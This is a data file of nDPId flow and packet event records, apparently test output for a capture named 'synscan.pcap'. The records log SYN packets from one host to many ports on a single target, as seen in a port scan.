+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsvUQAACYGZS6sEAAIQA2GNIzTATfdU4MZAAAAAGACDAArVQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsHykAADQG9UmsEAAIQA2GNIzTCqXdU4MZAAAAAGACBAAp5wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsL60AACgG8MWsEAAIQA2GNIzTH5TdU4MZAAAAAGACBAAU+AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsXrcAACYGw7usEAAIQA2GNIzTAFrdU4MZAAAAAGACDAAsMgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/GMAAC4GHg+sEAAIQA2GNIzTAjPdU4MZAAAAAGACDAAqWQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAs3yEAADoGL1GsEAAIQA2GNIzTJpXdU4MZAAAAAGACDAAF9wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAssu0AACkGbIWsEAAIQA2GNIzTB8DdU4MZAAAAAGACCAAozAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsiNYAADQGi5ysEAAIQA2GNIzTALPdU4MZAAAAAGACBAAz2QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpYAACUG+NysEAAIQA2GNIzTH53dU4MZAAAAAGACCAAQ7wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsn1UAACYGgx2sEAAIQA2GNIzTFubdU4MZAAAAAGACDAAVpgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsUnoAAC4Gx\/isEAAIQA2GNIzTB\/HdU4MZAAAAAGACDAAkmwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsOmgAADcG1wqsEAAIQA2GNIzTKAPdU4MZAAAAAGACEAAAiQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsnegAACYGhIqsEAAIQA2GNIzTAQPdU4MZAAAAAGACDAAriQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAs+6cAADQGGMusEAAIQA2GNIzT6nTdU4MZAAAAAGACBABKFwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAscTcAADAGpzusEAAIQA2GNIzTA\/3dU4MZAAAAAGACBAAwjwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAsQq0AACUG4MWsEAAIQA2GNIzTJxzdU4MZAAAAAGACCAAJcAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsKY4AADkG5eSsEAAIQA2GNIzTDL3dU4MZAAAAAGACCAAjzwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAseEMAADcGmS+sEAAIQA2GNIzTwAXdU4MZAAAAAGACEABohgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAss4gAADIGYuqsEAAIQA2GNIzTAgDdU4MZAAAAAGACDAAqjAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs5VEAACYGPSGsEAAIQA2GNIzTBBTdU4MZAAAAAGACDAAoeAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsuG8AADcGWQOsEAAIQA2GNIzTDMTdU4MZAAAAAGACEAAbyAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAslPkAACYGjXmsEAAIQA2GNIzTF0rdU4MZAAAAAGACDAAVQgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAshy8AACwGlUOsEAAIQA2GNIzTFJXdU4MZAAAAAGACBAAf9wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs66kAACoGMsmsEAAIQA2GNIzTB\/LdU4MZAAAAAGACDAAkmgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 